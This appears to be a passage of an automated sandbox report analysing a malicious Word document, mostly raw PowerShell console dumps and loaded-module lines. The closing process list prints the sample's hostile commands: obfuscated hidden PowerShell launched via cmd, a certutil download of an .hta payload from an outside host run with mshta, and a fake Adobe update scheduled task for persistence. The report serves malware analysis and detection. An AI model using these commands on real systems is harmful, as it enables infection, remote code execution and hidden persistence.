Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D...".....................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...J.............................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D...e.....................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.\.....Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........x.......+... .......A.Gux...............a.Gu..0.............D.......................+.......X.........Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................+.......\...A.Gu................a.Gu..0.............D.......................+.................Fu........Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U......3.i..../........3.i......}.L|.iH.....-l$(.i..-l..K;L|.i.............7.i4......i..}...>.......U.....$(.i...i....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.../.....>.....A.Gu8...............a.Gu..0...................................../.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...;.....>.....A.Gu................a.Gu..0.....................................;.........U.\.....Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...;.....>.....A.Gu8...............a.Gu..0.....................................;.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............\...G...A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.8.0.................B...................G...........".....Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...G.....>.....A.Gu8...............a.Gu..0................._...................G.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...S.....>.....A.Gu................a.Gu..0.....................................S.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...S.....>.....A.Gu8...............a.Gu..0.....................................S.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\..._.....>.....A.Gu................a.Gu..0....................................._.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\..._.....>.....A.Gu8...............a.Gu..0....................................._.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...k.....>.....A.Gu................a.Gu..0.....................................k.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...k.....>.....A.Gu8...............a.Gu..0.................(...................k.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...w.....>.....A.Gu................a.Gu..0.................P...................w.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...w.....>.....A.Gu8...............a.Gu..0.................k...................w.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................9.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0.................a.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................|.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0.................+.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................F.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0.................n.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0.................9.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................T.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0.................|.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...+.....>.....A.Gu................a.Gu..0.................E...................+.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...+.....>.....A.Gu8...............a.Gu..0.................`...................+.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...7.....>.....A.Gu................a.Gu..0.....................................7.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...7.....>.....A.Gu8...............a.Gu..0.....................................7.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...C.....>.....A.Gu................a.Gu..0.....................................C.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...C.....>.....A.Gu8...............a.Gu..0.....................................C.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...O.....>.....A.Gu................a.Gu..0.....................................O.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...O.....>.....A.Gu8...............a.Gu..0.................)...................O.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...[.....>.....A.Gu................a.Gu..0.................Q...................[.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...[.....>.....A.Gu8...............a.Gu..0.................l...................[.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...g.....>.....A.Gu................a.Gu..0.....................................g.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...g.....>.....A.Gu8...............a.Gu..0.....................................g.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...s.....>.....A.Gu................a.Gu..0.....................................s.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...s.....>.....A.Gu8...............a.Gu..0.....................................s.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................5.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0.................].............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................x.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0.................&.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................A.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0.................i.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0.................3.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................N.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0.................v.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0.................?.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................Z.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...'.....>.....A.Gu................a.Gu..0.....................................'.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...'.....>.....A.Gu8...............a.Gu..0.....................................'.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...3.....>.....A.Gu................a.Gu..0.....................................3.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...3.....>.....A.Gu8...............a.Gu..0.................#...................3.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...?.....>.....A.Gu................a.Gu..0.................K...................?.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...?.....>.....A.Gu8...............a.Gu..0.................f...................?.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...K.....>.....A.Gu................a.Gu..0.....................................K.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...K.....>.....A.Gu8...............a.Gu..0.....................................K.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...W.....>.....A.Gu................a.Gu..0.....................................W.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...W.....>.....A.Gu8...............a.Gu..0.....................................W.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...c.....>.....A.Gu................a.Gu..0.....................................c.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...c.....>.....A.Gu8...............a.Gu..0.................2...................c.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...o.....>.....A.Gu................a.Gu..0.................Z...................o.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...o.....>.....A.Gu8...............a.Gu..0.................u...................o.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\...{.....>.....A.Gu................a.Gu..0.....................................{.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...{.....>.....A.Gu8...............a.Gu..0.....................................{.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0.................#.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................>.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0.................f.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0................./.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................J.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0.................w.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0.................A.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................\.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.\.....Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................%.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ............\...#... .>.....A.Gu................a.Gu..0.................M...................#.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........8...\...#.....>.....A.Gu8...............a.Gu..0.................h...................#.................Fu........
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: Spiez CONVERGENCE.docvirustotal: Detection: 52%
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\Spiez CONVERGENCE.doc
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\WinDoWS\sysTEm32\CMD.EXe' /c 'SeT STI= $iBHrW = [tyPE]('{2}{7}{8}{3}{0}{5}{1}{6}{4}'-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .('{0}{1}{2}'-f'S','ET','-iTEM') ('{0}{2}{1}' -f 'VAr','Le:7B1M','iAB') ([tYPe]('{2}{3}{1}{0}' -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]('{0}{1}'-F 'R','EF') ; ^&('{1}{2}{0}'-f '-iTEM','SE','T') ('{1}{0}{2}'-f'iAbL','vAr','e:04k') ( [tyPe]('{4}{3}{0}{1}{5}{2}'-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]('{0}{1}{6}{4}{2}{5}{3}'-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .('{2}{0}{1}' -f'E','M','seT-iT') ('V'+'Ar'+'Ia'+'Ble:kmd') ( [tYPe]('{6}{3}{4}{5}{0}{2}{1}'-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]('{2}{0}{4}{1}{5}{3}'-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .('{2}{3}{0}{1}' -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath '$env:USERPROFILE\\AppData\\Local\\Microsoft' -ErrorAction ('{1}{4}{0}{3}{2}'-f'tlyC','Si
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\WinDoWS\sysTEm32\CMD.EXe /c%rbH%
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' eChO ieX (gCi ENv:STi).VALUe '
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRshell -noNInteraC -ex byPASs -NopRofIlE -NOExIT -wInDows HiDdEN -
Source: unknownProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -urlcache -split -f https://mysent.org/access.log.txt C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\libsys.hta
Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\libsys.hta'
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD.ExE /C%OmWi%
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' ecHo IEX (GI enV:Kjv).valUe '
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powERSHeLl -nOnInTeRac -eXecUTiOn byPASs -NOeX -NoPRofiL -WiN hIddEN -
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1516
Source: unknownProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1516
Source: unknownProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3664 -s 1460
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /query
Source: unknownProcess created: C:\Windows\System32\findstr.exe 'C:\Windows\system32\findstr.exe' /i AdobeUpdateTaskDailyCore
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RL HIGHEST /F /SC DAILY /ST 10:00 /TN AdobeUpdateTaskDailyCore /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c \'& $env:isjeuccptoxa ($env:jtkfvddqlpyc + $env:kulgweeimqae + $env:lvmhxfvjnrbg + $env:mwniywwkosci)\''
